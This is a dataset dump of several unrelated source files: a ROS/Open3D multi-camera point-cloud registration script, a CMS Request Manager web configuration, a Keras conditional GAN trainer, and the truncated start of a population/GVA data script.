doctest.NORMALIZE_WHITESPACE)\n","sub_path":"helm/tracker/detectors/detector_factory.py","file_name":"detector_factory.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"207484335","text":"import argparse\nimport cv2\nimport logging\nimport numpy as np\nimport os\nimport sys\nimport time\nimport traceback\nimport rospy\nimport struct\nimport ctypes\nfrom sensor_msgs import point_cloud2\nfrom sensor_msgs.msg import PointCloud2, PointField\nfrom std_msgs.msg import Header\n\nfrom autolab_core import RigidTransform\nfrom perception import CameraIntrinsics\n\ntry:\n import cv2\n import pylibfreenect2 as lf2\nexcept:\n logging.warning('Unable to import pylibfreenect2. Python-only Kinect driver may not work properly.')\n\ntry:\n from cv_bridge import CvBridge, CvBridgeError\n import rospy\n import sensor_msgs.msg\nexcept ImportError:\n logging.warning(\"Failed to import ROS in Kinect2_sensor.py. 
Kinect will not be able to be used in bridged mode\")\n\n\nimport open3d as o3d\nimport copy\n\nfrom pcl_registration_utils import point_cloud_to_color_arr, make_pcd, visualize, get_pcd_bounds_str\n\ndef max_test_overhead_idx():\n f_list = os.listdir('./train_overhead_data')\n overhead_list = [f[:-4] for f in f_list if 'data' in f and 'pcd' in f]\n if len(overhead_list) == 0:\n return -1\n overhead_num = [int(f.split('_')[-1]) for f in overhead_list]\n return max(overhead_num)\n\n\ndef get_transform_file_for_dir(d):\n assert os.path.exists(d), 'Dir does not exist: {}'.format(d)\n # if 'overhead' in d:\n # return os.path.join(d, 'kinect2_overhead_to_world_calc_from_base.tf')\n # return os.path.join(d, 'kinect2_overhead_to_world.tf')\n return os.path.join(d, 'kinect2_overhead_to_world_calc_from_base.tf')\n\n\n\nclass PCLRegistrationUtils(object):\n def __init__(self): \n self.calib_dirs = { \n 'front_right': './calib/robot_middle/azure_kinect_front_right',\n 'front_left': './calib/robot_middle/azure_kinect_front_left',\n 'overhead': './calib/robot_middle/azure_kinect_overhead',\n }\n self.transform_by_camera = {} \n for k, v in self.calib_dirs.items():\n T = RigidTransform.load(get_transform_file_for_dir(v))\n T.from_frame = k\n T.to_frame = 'world'\n self.transform_by_camera[k] = T\n \n self.stereo_calib_data = [\n # (from, to, path)\n # ('front_right', 'overhead', './calib/stereo_calib_azure_cpp/Nov_19_try_3/overhead_to_front_right_x.tf')\n # ('front_right', 'overhead', './calib/stereo_calib_azure_cpp/Nov_20_matlab/overhead_to_front_right_3.tf')\n\n # do the inverse of this one?\n # ('front_right', 'overhead', './calib/stereo_calib_azure_cpp/Nov_21_combined/overhead_to_front_right_3.tf'),\n\n ('overhead', 'front_left', './calib/stereo_calib_azure_cpp/main_overhead_sec_front_left/front_left_to_overhead_5.tf'),\n\n # Transf between front_left and back_left camera \n ('front_left', 'back_left', './calib/stereo_calib_azure_cpp/main_front_left_sec_back_left/back_left_to_front_left_7.tf'),\n\n # Transf between front_right and back_right camera\n ('front_right', 'back_right', './calib/stereo_calib_azure_cpp/main_front_right_sec_back_right/back_right_to_front_right_2.tf')\n ]\n self.stereo_calib_dict = {}\n for s in self.stereo_calib_data:\n T = RigidTransform.load(s[2])\n T.from_frame = s[0]\n T.to_frame = s[1]\n self.stereo_calib_dict['{}${}'.format(s[1], s[0])] = T\n\n self.T_overhead_front_right = (self.transform_by_camera['overhead'].inverse()).dot(self.transform_by_camera['front_right'])\n self.T_overhead_front_left = (self.transform_by_camera['overhead'].inverse()).dot(self.transform_by_camera['front_left'])\n\n rospy.loginfo(\"Original transf matrix: \\n{}\".format(\n np.array_str(self.T_overhead_front_right.matrix, precision=5, suppress_small=True)))\n rospy.loginfo(\"New transf matrix: \\n{}\".format(\n np.array_str(self.stereo_calib_dict['front_left$overhead'].inverse().matrix, \n precision=5, suppress_small=True)))\n\n rospy.loginfo(\"Front left -> overhead transf matri: \\n\"\n \" Original : \\n{}\\n\"\n \" new : \\n{}\\n\".format(\n np.array_str(self.T_overhead_front_right.matrix, precision=5, suppress_small=True),\n np.array_str(self.stereo_calib_dict['front_left$overhead'].inverse().matrix, \n precision=5, suppress_small=True)\n ))\n\n # import pdb; pdb.set_trace()\n\n self.point_cloud_by_camera_dict = {}\n self.has_pcd_by_camera_dict = {}\n\n self.pcl_volume_min_bound = np.array([0.1, -0.4, -0.05])\n self.pcl_volume_max_bound = np.array([0.8, 0.4, 0.5])\n\n self.voxel_size = 
0.01\n self.max_correspondence_distance_coarse = self.voxel_size * 15\n self.max_correspondence_distance_fine = self.voxel_size * 1.5\n\n\n def pairwise_registration(self, source, target):\n icp_coarse = o3d.registration.registration_icp(\n source, target, self.max_correspondence_distance_coarse, np.identity(4),\n o3d.registration.TransformationEstimationPointToPlane())\n icp_fine = o3d.registration.registration_icp(\n source, target, self.max_correspondence_distance_fine,\n icp_coarse.transformation,\n o3d.registration.TransformationEstimationPointToPlane())\n transformation_icp = icp_fine.transformation\n information_icp = o3d.registration.get_information_matrix_from_point_clouds(\n source, target, self.max_correspondence_distance_fine,\n icp_fine.transformation)\n return transformation_icp, information_icp\n\n def full_registration(self, pcds):\n pose_graph = o3d.registration.PoseGraph()\n odometry = np.identity(4)\n pose_graph.nodes.append(o3d.registration.PoseGraphNode(odometry))\n n_pcds = len(pcds)\n for source_id in range(n_pcds):\n for target_id in range(source_id + 1, n_pcds):\n transformation_icp, information_icp = self.pairwise_registration(\n pcds[source_id], pcds[target_id])\n print(\"Build o3d.registration.PoseGraph\")\n if target_id == source_id + 1: # odometry case\n odometry = np.dot(transformation_icp, odometry)\n pose_graph.nodes.append(\n o3d.registration.PoseGraphNode(np.linalg.inv(odometry)))\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=False))\n else: # loop closure case\n pose_graph.edges.append(\n o3d.registration.PoseGraphEdge(source_id,\n target_id,\n transformation_icp,\n information_icp,\n uncertain=True))\n return pose_graph\n\n\n def merge_multiple_pcd(self, pcd_list):\n for pcd in pcd_list:\n print(\"PCD min_bound: {}, max_bound: {}\".format(\n pcd.get_min_bound(), pcd.get_max_bound()))\n voxel_size = self.voxel_size\n voxel_grids = []\n for p in pcd_list:\n # v = o3d.geometry.VoxelGrid.create_from_point_cloud(p, 0.01)\n voxel_grids.append(p)\n \n '''\n for voxel_grid in voxel_grids: rospy.loginfo(\"old voxel grid size: {}\".format(len(voxel_grid.voxels)))\n voxel_list = voxel_grid.voxels\n for x in range(60, 120):\n for z in range(40, 80):\n v = o3d.geometry.Voxel([x, 0, z], [255, 0, 0])\n voxel_list.append(v)\n voxel_grid.voxels = voxel_list\n rospy.loginfo(\"new voxel grid size: {}\".format(len(voxel_grid.voxels)))\n visualize([voxel_grid])\n '''\n visualize(voxel_grids)\n import pdb; pdb.set_trace()\n\n visualize(voxel_grids[:1])\n visualize(voxel_grids[1:2])\n visualize(voxel_grids[2:3])\n\n\n # Find which voxels are occupied\n all_voxel_map = np.zeros((200, 200, 100), dtype=np.int32)\n for voxel_grid in voxel_grids:\n for v in voxel_grid.voxels:\n vi = v.grid_index\n if (vi[0] < all_voxel_map.shape[0] and\n vi[1] < all_voxel_map.shape[1] and\n vi[2] < all_voxel_map.shape[2]):\n all_voxel_map[vi[0], vi[1], vi[2]] += 1\n else:\n import pdb; pdb.set_trace()\n\n # Now remove the voxels which are not found in the rest\n\n for voxel_grid in voxel_grids:\n filt_voxels = []\n for v in voxel_grid.voxels:\n vi = v.grid_index\n if (vi[0] < all_voxel_map.shape[0] and\n vi[1] < all_voxel_map.shape[1] and\n vi[2] < all_voxel_map.shape[2]):\n # If this voxel was claimed as present by multiple cameras then\n # fill it. 
Should we also \n if all_voxel_map[vi[0], vi[1], vi[2]] >= 2:\n filt_voxels.append(v)\n voxel_grid.voxels = filt_voxels\n\n visualize(voxel_grids[:1])\n visualize(voxel_grids[1:2])\n visualize(voxel_grids[2:3])\n\n # import pdb; pdb.set_trace()\n\n pcds_down = [pcd.voxel_down_sample(voxel_size=self.voxel_size) for pcd in pcd_list]\n\n # Visualize\n visualize(pcds_down[:1])\n visualize(pcds_down[1:2])\n visualize(pcds_down[2:3])\n visualize(pcds_down)\n\n print(\"Full registration ...\")\n pose_graph = self.full_registration(pcds_down)\n\n print(\"Optimizing PoseGraph ...\")\n option = o3d.registration.GlobalOptimizationOption(\n max_correspondence_distance=self.max_correspondence_distance_fine,\n edge_prune_threshold=0.25,\n reference_node=0)\n o3d.registration.global_optimization(\n pose_graph, o3d.registration.GlobalOptimizationLevenbergMarquardt(),\n o3d.registration.GlobalOptimizationConvergenceCriteria(), option)\n\n print(\"Transform points and display\")\n for point_id in range(len(pcds_down)):\n print(pose_graph.nodes[point_id].pose)\n pcds_down[point_id].transform(pose_graph.nodes[point_id].pose)\n o3d.visualization.draw_geometries(pcds_down)\n\n print(\"Make a combined point cloud\")\n # pcds = load_point_clouds(voxel_size)\n pcds = [pcd.voxel_down_sample(voxel_size=self.voxel_size) for pcd in pcd_list]\n pcd_combined = o3d.geometry.PointCloud()\n for point_id in range(len(pcds)):\n pcds[point_id].transform(pose_graph.nodes[point_id].pose)\n pcd_combined += pcds[point_id]\n pcd_combined_down = pcd_combined.voxel_down_sample(voxel_size=self.voxel_size)\n o3d.io.write_point_cloud(\"./multiway_registration.pcd\", pcd_combined_down)\n o3d.visualization.draw_geometries([pcd_combined_down])\n\n\n def get_transform_point_cloud_from_raw_data(self, data, camera_key):\n if 'overhead' in camera_key:\n color = [255, 0, 0]\n else:\n color = [0, 0, 255]\n color = None\n # pcl_arr = point_cloud_to_mat(data)\n pcl_arr, rgb_arr = point_cloud_to_color_arr(data, color=color)\n # T = self.transform_by_camera[camera_key]\n # transf_pcl_arr = np.dot(T.matrix, pcl_arr.T)\n if camera_key == 'front_right_no':\n # transf_pcl_arr = np.dot(self.T_overhead_front_right.matrix, pcl_arr.T)\n M = self.stereo_calib_dict['overhead$front_right'].inverse().matrix\n # M[0, 3] = self.T_overhead_front_right.matrix[0, 3]\n # M[1, 3] = self.T_overhead_front_right.matrix[1, 3]\n # M[2, 3] = self.T_overhead_front_right.matrix[2, 3]\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n elif camera_key == 'front_left': \n # We don't take an inverse since we want to view everything in the overhead \n # camera's frame.\n M = self.stereo_calib_dict['front_left$overhead'].matrix\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n elif camera_key == 'back_left':\n M = self.stereo_calib_dict['back_left$front_left'].matrix\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n elif camera_key == 'back_right':\n M = self.stereo_calib_dict['back_right$front_right'].matrix\n transf_pcl_arr = np.dot(M, pcl_arr.T)\n else:\n transf_pcl_arr = np.dot(np.eye(4), pcl_arr.T)\n\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(transf_pcl_arr[:3, :].T)\n pcd.colors = o3d.utility.Vector3dVector(rgb_arr[:, :3]/255.0)\n return pcd\n\n def pcl_callback(self, data):\n rospy.loginfo(\"Got data: {}\".format(type(data)))\n # cloud, rgb = get_cloud(data)\n cloud_arr, rgb_arr = point_cloud_to_color_arr(data)\n\n point_cloud_arr = point_cloud_to_mat(data)\n # T_mat = transform.matrix\n # rospy.loginfo('point_cloud_arr: {}'.format(point_cloud_arr.shape))\n # 
transf_pc_arr = np.dot(T_mat, point_cloud_arr)\n print(cloud_arr.shape)\n print(point_cloud_arr.shape)\n\n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(cloud_arr[:, :3])\n pcd.colors = o3d.utility.Vector3dVector(rgb_arr[:, :3]/255.0)\n # o3d.io.write_point_cloud(\"./open3d_sync.ply\", pcd)\n\n # Load saved point cloud and visualize it\n # pcd_load = o3d.io.read_point_cloud(\"./open3d_sync.ply\")\n o3d.visualization.draw_geometries([pcd])\n\n def save_pcd_with_camera_key(self, data, camera_key):\n if self.has_pcd_by_camera_dict.get(camera_key):\n return\n print(\"Will save pcd for camera: {}\".format(camera_key))\n pcd = self.get_transform_point_cloud_from_raw_data(data, camera_key)\n\n print(\"back_right bounds BEFORE crop: => {}\".format(get_pcd_bounds_str(pcd)))\n # pcd = pcd.crop(self.pcl_volume_min_bound, self.pcl_volume_max_bound)\n print(\"back_right bounds AFTER crop: => {}\".format(get_pcd_bounds_str(pcd)))\n\n self.point_cloud_by_camera_dict[camera_key] = pcd\n self.has_pcd_by_camera_dict[camera_key] = True\n rospy.loginfo(\"Did get camera data {}\".format(camera_key))\n idx = max_test_overhead_idx() + 1\n pcd_path = os.path.join('./register_{}_data_{}.pcd'.format(camera_key, idx))\n o3d.io.write_point_cloud(pcd_path, pcd)\n rospy.loginfo(\"Did save pcd: {}\".format(pcd_path))\n\n def back_right_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'back_right')\n\n def front_right_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'front_right')\n\n def front_left_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'front_left')\n\n def back_left_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'back_left')\n\n def overhead_pcl_callback(self, data):\n self.save_pcd_with_camera_key(data, 'overhead')\n\n\ndef main():\n rospy.init_node('test_k4a_pcl', anonymous=True)\n rospy.loginfo('Test k4a pcl!!')\n\n o3d.utility.set_verbosity_level(o3d.utility.VerbosityLevel.Debug)\n\n pcl_reg = PCLRegistrationUtils()\n rospy.loginfo(\"Did load transform for camers: {}\".format(len(pcl_reg.transform_by_camera)))\n\n pc_topics_by_callback = [\n # ('/points2', pcl_callback),\n # ('/back_right_kinect/points2', pcl_reg.back_right_pcl_callback),\n # ('/front_right_kinect/points2', pcl_reg.front_right_pcl_callback),\n ('/front_left_kinect/points2', pcl_reg.front_left_pcl_callback),\n ('/overhead_kinect/points2', pcl_reg.overhead_pcl_callback),\n # ('/back_left_kinect/points2', pcl_reg.back_left_pcl_callback),\n ]\n # pc_topic = \"/points2\"\n # pc_sub = rospy.Subscriber(pc_topic, PointCloud2, pcl_callback)\n for p in pc_topics_by_callback:\n pc_sub = rospy.Subscriber(p[0], PointCloud2, p[1])\n\n while not rospy.is_shutdown():\n rospy.loginfo(\"point_cloud_dict size\".format(len(pcl_reg.point_cloud_by_camera_dict)))\n if len(pcl_reg.point_cloud_by_camera_dict) == 2:\n # Do registration\n # for main and secondary, the first argument should be secondary and then main \n # pcd_list = [\n # pcl_reg.point_cloud_by_camera_dict['front_left'],\n # pcl_reg.point_cloud_by_camera_dict['overhead'],\n # # pcl_reg.point_cloud_by_camera_dict['front_right'],\n # ]\n pcd_list = [\n pcl_reg.point_cloud_by_camera_dict['front_left'],\n pcl_reg.point_cloud_by_camera_dict['overhead'],\n # pcl_reg.point_cloud_by_camera_dict['front_right'],\n ]\n rospy.loginfo(\"Will try to register multiple point clouds.\")\n pcl_reg.merge_multiple_pcd(pcd_list)\n break\n \n # if len(pcl_reg.point_cloud_by_camera_dict) == 1:\n # print(\"Did save some data\")\n # 
break\n\n rospy.sleep(1.0)\n\n # rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"manipulation/azure_kinect_calibration/k4a_pcl_synthesis_open3d.py","file_name":"k4a_pcl_synthesis_open3d.py","file_ext":"py","file_size_in_byte":17622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"490521657","text":"import os, re, socket, thread\n__all__ = []\nfrom WMCore.WMInit import getWMBASE\nfrom WMCore.Configuration import Configuration\nfrom ReqMgrSecrets import connectUrl\n\n#\n# Configuration that matters\n#\nHOST = socket.getfqdn().lower()\nPORT = 8245\nCOUCH = \"https://%s/couchdb\" % HOST\nif re.match(r\"^vocms(?:13[689]|140|16[13])\\.cern\\.ch$\", HOST):\n COUCH = \"https://cmsweb.cern.ch/couchdb\"\nelif re.match(r\"^vocms(?:13[23])\\.cern\\.ch$\", HOST):\n COUCH = \"https://cmsweb-testbed.cern.ch/couchdb\"\nelif re.match(r\"^vocms127\\.cern\\.ch$\", HOST):\n COUCH = \"https://cmsweb-dev.cern.ch/couchdb\"\n\nconfigCouchDB = 'analysis_reqmgr_config_cache'\nworkloadCouchDB = 'analysis_reqmgr_workload_cache'\nworkloadSummaryCouchDB = \"analysis_workloadsummary\"\nwmstatCouchDB = \"analysis_wmstats\"\nsitedb = 'https://cmsweb.cern.ch/sitedb/json/index/CEtoCMSName?name'\ndbs3 = 'http://vocms09.cern.ch:8989/dbs'\nyuiroot = \"/an_reqmgr/yuiserver/yui\"\n\nINSTALL = getWMBASE()\nTEMPLATES = os.path.normpath(os.path.join(INSTALL, '../../../data/templates/WMCore/WebTools'))\nJAVASCRIPT_PATH = os.path.normpath(os.path.join(INSTALL, '../../../data/javascript'))\nHTML_PATH = os.path.normpath(os.path.join(INSTALL, '../../../data/html'))\nSECURITY_ROLES = ['Admin', 'Developer', 'Data Manager', 'developer', 'admin', 'data-manager', 'facops', 'FacOps']\n\n#\n# Beginning of the boilerplate configuration bits\n#\nconfig = Configuration()\n\nconfig.component_(\"Webtools\")\nconfig.Webtools.host = '0.0.0.0'\nconfig.Webtools.port = PORT\nconfig.Webtools.application = \"an_reqmgr\"\nconfig.Webtools.environment = 'production'\n#config.Webtools.environment = 'development'\nconfig.Webtools.proxy_base = 'True'\nconfig.Webtools.thread_pool = 30\nthread.stack_size(128*1024)\n\nconfig.component_('SecurityModule')\nconfig.SecurityModule.key_file = \"%s/auth/wmcore-auth/header-auth-key\" % __file__.rsplit('/', 3)[0]\n\nconfig.component_('an_reqmgr')\nconfig.section_(\"CoreDatabase\")\nconfig.CoreDatabase.connectUrl = connectUrl\nconfig.an_reqmgr.section_('database')\nconfig.an_reqmgr.database.connectUrl = connectUrl\nconfig.an_reqmgr.componentDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + \"/var\"\nconfig.an_reqmgr.templates = os.path.join(TEMPLATES, 'RequestManager')\nconfig.an_reqmgr.html = os.path.join(HTML_PATH, 'RequestManager')\nconfig.an_reqmgr.javascript = JAVASCRIPT_PATH\nconfig.an_reqmgr.admin = 'cms-service-webtools@cern.ch'\nconfig.an_reqmgr.title = 'CMS Request Manager'\nconfig.an_reqmgr.description = 'CMS Request Manager'\nconfig.an_reqmgr.couchUrl = COUCH\nconfig.an_reqmgr.configDBName = configCouchDB\nconfig.an_reqmgr.workloadDBName = workloadCouchDB\nconfig.an_reqmgr.wmstatDBName = wmstatCouchDB\nconfig.an_reqmgr.security_roles = SECURITY_ROLES\nconfig.an_reqmgr.yuiroot = yuiroot\nconfig.an_reqmgr.dbs3 = dbs3\n\nviews = config.an_reqmgr.section_('views')\nactive = views.section_('active')\n\nactive.section_('view')\nactive.view.object = 'WMCore.HTTPFrontEnd.RequestManager.ReqMgrBrowser'\n\nactive.section_('admin')\nactive.admin.object = 
'WMCore.HTTPFrontEnd.RequestManager.Admin'\n\nactive.section_('approve')\nactive.approve.object = 'WMCore.HTTPFrontEnd.RequestManager.Approve'\n\nactive.section_('assign')\nactive.assign.object = 'WMCore.HTTPFrontEnd.RequestManager.Assign'\nactive.assign.sitedb = sitedb\nactive.assign.opshold = False\nactive.assign.clipboardDB = 'ops_clipboard'\n\nactive.section_('closeout')\nactive.closeout.object = 'WMCore.HTTPFrontEnd.RequestManager.CloseOut'\n\nactive.section_('announce')\nactive.announce.object = 'WMCore.HTTPFrontEnd.RequestManager.Announce'\n\nactive.section_('reqMgr')\nactive.reqMgr.section_('model')\nactive.reqMgr.section_('formatter')\nactive.reqMgr.object = 'WMCore.WebTools.RESTApi'\nactive.reqMgr.model.object = 'WMCore.HTTPFrontEnd.RequestManager.ReqMgrRESTModel'\nactive.reqMgr.default_expires = 0 # no caching\nactive.reqMgr.formatter.object = 'WMCore.WebTools.RESTFormatter'\nactive.reqMgr.templates = TEMPLATES\nactive.reqMgr.html = os.path.join(HTML_PATH, 'RequestManager')\n\nactive.section_('rest')\nactive.rest.section_('model')\nactive.rest.section_('formatter')\nactive.rest.object = 'WMCore.WebTools.RESTApi'\nactive.rest.model.object = 'WMCore.HTTPFrontEnd.RequestManager.ReqMgrRESTModel'\nactive.rest.default_expires = 0 # no caching\nactive.rest.formatter.object = 'WMCore.WebTools.RESTFormatter'\nactive.rest.templates = TEMPLATES\n\nactive.section_('create')\nactive.create.object = 'WMCore.HTTPFrontEnd.RequestManager.WebRequestSchema'\nactive.create.requestor = None\nactive.create.cmsswDefaultVersion = 'CMSSW_5_2_5'\n\nactive.section_('yuiserver')\nactive.yuiserver.object = 'WMCore.WebTools.YUIServer'\nactive.yuiserver.yuidir = os.getenv(\"YUI_ROOT\")\n","sub_path":"an_reqmgr/ReqMgrConfig.py","file_name":"ReqMgrConfig.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74165259","text":"from keras.layers import Input\nfrom keras.models import Model, load_model\nfrom keras.optimizers import Adam\nimport os\nimport numpy as np\n\n\nfrom . import metrics\nfrom . 
import utils\n\n# Conditional Generative Adversarial Network\n# Paper: https://arxiv.org/pdf/1411.1784.pdf\n\n# Description:\n# Takes as input dataset with it class labels and learn to generate samples \n# similar to original dataset specified by some given labels.\n\nclass CGAN():\n def metric_test(self, set_data, set_labels, pred_num = 32): \n met_arr = np.zeros(pred_num)\n \n n_indx = np.random.choice(set_data.shape[0],pred_num)\n labels = set_labels[n_indx]\n org_set = set_data[n_indx]\n \n noise = np.random.uniform(-1, 1, (pred_num, self.latent_dim))\n gen_set = self.generator.predict([noise,labels]) \n met_arr = metrics.magic_distance(org_set, gen_set)\n return met_arr\n\n def __init__(self, input_shape, label_shape, latent_dim = 100, mode = 'vanilla'):\n # Input shape\n self.input_shape = input_shape\n self.label_shape = label_shape\n self.latent_dim = latent_dim\n self.mode = mode\n \n self.build_discriminator = None\n self.build_generator = None\n \n self.best_model = None\n self.best_metric = 0\n \n self.epoch = 0\n self.history = None\n \n def build_models(self, optimizer = None, path = ''):\n if optimizer is None:\n optimizer = Adam(0.0002, 0.5)\n \n if self.mode == 'stable':\n loss = 'logcosh'\n self.disc_activation = 'linear'\n elif self.mode == 'vanilla':\n loss = 'binary_crossentropy'\n self.disc_activation = 'sigmoid'\n else: raise Exception(\"Mode '\" + self.mode+ \"' is unknown\")\n \n self.path = path\n if os.path.isfile(path+'/generator.h5') and os.path.isfile(path+'/discriminator.h5'):\n self.generator = load_model(path+'/generator.h5')\n self.discriminator = load_model(path+'/discriminator.h5')\n else:\n if self.build_discriminator is None or self.build_generator is None:\n raise Exception(\"Model building functions are not defined\")\n else:\n # Build and compile the discriminator\n self.discriminator = self.build_discriminator()\n self.discriminator.compile(loss=loss, optimizer=optimizer)\n\n # Build the generator\n self.generator = self.build_generator()\n\n # The generator takes noise and the target label as input\n # and generates the corresponding digit of that label\n noise = Input(shape=(self.latent_dim,))\n label = Input(shape=self.label_shape)\n img = self.generator([noise, label])\n\n # For the combined model we will only train the generator\n self.discriminator.trainable = False\n\n # The discriminator takes generated image as input and determines validity\n # and the label of that image\n valid = self.discriminator([img, label])\n\n # The combined model (stacked generator and discriminator)\n # Trains generator to fool discriminator\n self.combined = Model([noise, label], valid)\n self.combined.compile(loss=loss, optimizer=optimizer)\n \n print('models builded') \n \n def save(self):\n self.generator.save(self.path+'/generator.h5')\n self.discriminator.save(self.path+'/discriminator.h5')\n \n def train(self, data_set, label_set, batch_size=32, epochs=1, verbose=True, checkpoint_range = 100, checkpoint_callback = None, validation_split = 0, save_best_model = False):\n \"\"\"Trains the model for a given number of epochs (iterations on a dataset).\n # Arguments\n data_set: \n Numpy array of training data.\n data_labels: \n Numpy array of labels assigned with data_set \n batch_size:\n Number of samples per gradient update.\n epochs: Number of epochs to train the model.\n An epoch is an iteration over batch sized samples of dataset.\n checkpoint_range:\n Range in witch checkpoint callback will be called and history data will be stored.\n verbose: \n Integer. 
0, 1. Verbosity mode.\n checkpoint_callback: List of `keras.callbacks.Callback` instances.\n Callback to apply during training on checkpoint stage.\n validation_split: Float between 0 and 1.\n Fraction of the training data to be used as validation data.\n The model will set apart this fraction of the training data,\n will not train on it, and will evaluate\n the loss and any model metrics\n on this data at the end of each epoch.\n The validation data is selected from the last samples.\n save_best_model:\n Boolean. If True, generator weights will be resigned to best model according to chosen metric.\n # Returns\n A history object. \n \"\"\" \n \n if 0. < validation_split < 1.:\n split_at = int(data_set.shape[0] * (1. - validation_split))\n train_set_data = data_set[:split_at]\n valid_set_data = data_set[split_at:]\n \n train_set_labels = label_set[:split_at]\n valid_set_labels = label_set[split_at:]\n else:\n train_set_data = data_set\n train_set_labels = label_set\n valid_set_data = None\n valid_set_labels = None\n \n #collect statistical info of data\n data_set_std = np.std(data_set,axis = 0)\n data_set_mean = np.mean(data_set,axis = 0)\n \n label_set_std = np.std(label_set,axis = 0)\n label_set_mean = np.mean(label_set,axis = 0)\n \n # Adversarial ground truths\n valid = np.ones((batch_size, 1))\n fake = np.zeros((batch_size, 1))\n\n #mean min max\n max_hist_size = epochs//checkpoint_range + 1\n history = { 'gen_val' :np.zeros((max_hist_size,3)), \n 'train_val' :np.zeros((max_hist_size,3)), \n 'test_val' :np.zeros((max_hist_size,3)), \n 'data_control_val' :np.zeros((max_hist_size,3)), \n 'label_control_val' :np.zeros((max_hist_size,3)), \n 'metric' :np.zeros((max_hist_size,3)),\n 'best_metric' :0,\n 'hist_size' :0}\n \n for epoch in range(epochs):\n self.epoch = epoch\n \n # ---------------------\n # Train Discriminator\n # ---------------------\n\n # Select a random batch of images\n idx = np.random.randint(0, train_set_data.shape[0], batch_size)\n imgs, labels = train_set_data[idx], train_set_labels[idx]\n\n # Sample noise as generator input\n noise = np.random.uniform(-1, 1, (batch_size, self.latent_dim))\n\n # Generate new images\n gen_imgs = self.generator.predict([noise, labels])\n \n if self.mode == 'stable':\n trash_imgs = imgs.copy()\n trash_labels = labels.copy()\n trash_imgs[:batch_size//2] = np.random.normal(data_set_mean, data_set_std, (batch_size//2,) + self.input_shape)\n trash_labels[batch_size//2:] = np.random.normal(label_set_mean, label_set_std, (batch_size//2,) + self.label_shape)\n \n #trash_imgs = np.random.normal(train_set_mean, train_set_std, (batch_size,) + self.input_shape)\n\n # Validate how good generated images looks like\n val = self.discriminator.predict([gen_imgs,labels])\n crit = utils.Gravity(val, boundaries = [-1,1])\n \n # Train the discriminator\n d_loss_real = self.discriminator.train_on_batch([imgs,labels], valid)\n d_loss_fake = self.discriminator.train_on_batch([gen_imgs,labels], crit)\n d_loss_trsh = self.discriminator.train_on_batch([trash_imgs, trash_labels], -valid)\n d_loss = (d_loss_real + d_loss_fake + d_loss_trsh) / 3\n elif self.mode == 'vanilla':\n d_loss_real = self.discriminator.train_on_batch([imgs,labels], valid)\n d_loss_fake = self.discriminator.train_on_batch([gen_imgs,labels], fake)\n d_loss = (d_loss_real + d_loss_fake) / 2\n \n else: raise Exception(\"Mode '\" + self.mode+ \"' is unknown\")\n \n # ---------------------\n # Train Generator\n # ---------------------\n \n # Train the generator\n g_loss = 
self.combined.train_on_batch([noise, labels], valid)\n\n # Plot the progress\n if epoch % checkpoint_range == 0:\n gen_val = self.discriminator.predict([gen_imgs, labels])\n train_val = self.discriminator.predict([imgs, labels])\n \n if valid_set_data is not None and valid_set_labels is not None: \n idx = np.random.randint(0, valid_set_data.shape[0], batch_size)\n test_val = self.discriminator.predict([valid_set_data[idx], valid_set_labels[idx]])\n else:\n test_val = np.zeros(batch_size)\n \n noise_as_data = np.random.normal(data_set_mean, data_set_std, (batch_size,)+ self.input_shape)\n noise_as_labels = np.random.normal(label_set_mean, label_set_std, (batch_size,)+ self.label_shape)\n data_cont_val = self.discriminator.predict([noise_as_data, labels])\n label_cont_val = self.discriminator.predict([imgs, noise_as_labels])\n \n metric = self.metric_test(train_set_data, train_set_labels, 1000)\n if verbose:\n print (\"%d [D loss: %f] [G loss: %f] [validations TRN: %f, TST: %f] [metric: %f]\" % (epoch, d_loss, g_loss, np.mean(train_val), np.mean(test_val), np.mean(metric)))\n \n hist_size = history['hist_size'] = history['hist_size']+1\n history['gen_val'] [hist_size-1] = np.mean(gen_val), np.min(gen_val), np.max(gen_val)\n history['train_val'] [hist_size-1] = np.mean(train_val),np.min(train_val),np.max(train_val)\n history['test_val'] [hist_size-1] = np.mean(test_val), np.min(test_val), np.max(test_val)\n history['data_control_val'] [hist_size-1] = np.mean(data_cont_val), np.min(data_cont_val), np.max(data_cont_val) \n history['label_control_val'][hist_size-1] = np.mean(label_cont_val), np.min(label_cont_val), np.max(label_cont_val) \n history['metric'] [hist_size-1] = np.mean(metric), np.min(metric), np.max(metric)\n \n if np.mean(metric)*0.98 < self.best_metric or self.best_model == None:\n self.best_model = self.generator.get_weights()\n self.best_metric = np.mean(metric)\n history['best_metric'] = self.best_metric\n \n self.history = history\n \n if checkpoint_callback is not None:\n checkpoint_callback()\n \n \n \n if save_best_model:\n self.generator.set_weights(self.best_model) \n \n self.epoch = epochs\n checkpoint_callback() \n \n return self.history ","sub_path":"GANLib/CGAN.py","file_name":"CGAN.py","file_ext":"py","file_size_in_byte":11793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"64589042","text":"\"\"\"Create GVA per capita\n\nAfter running `simim` to provide population scenarios\n\"\"\"\nimport glob\nimport os\nimport sys\n\nimport pandas\n\n\ndef main(base_path):\n print(\"Start\")\n data_path = os.path.join(base_path, 'data_as_provided')\n output_path = os.path.join(base_path, 'data_processed')\n\n pop_filenames = glob.glob(os.path.join(data_path, 'arc_population__*.csv'))\n\n for pop_filename in pop_filenames:\n print(\"Processing\", pop_filename)\n key = os.path.basename(pop_filename).replace(\n 'arc_population__', 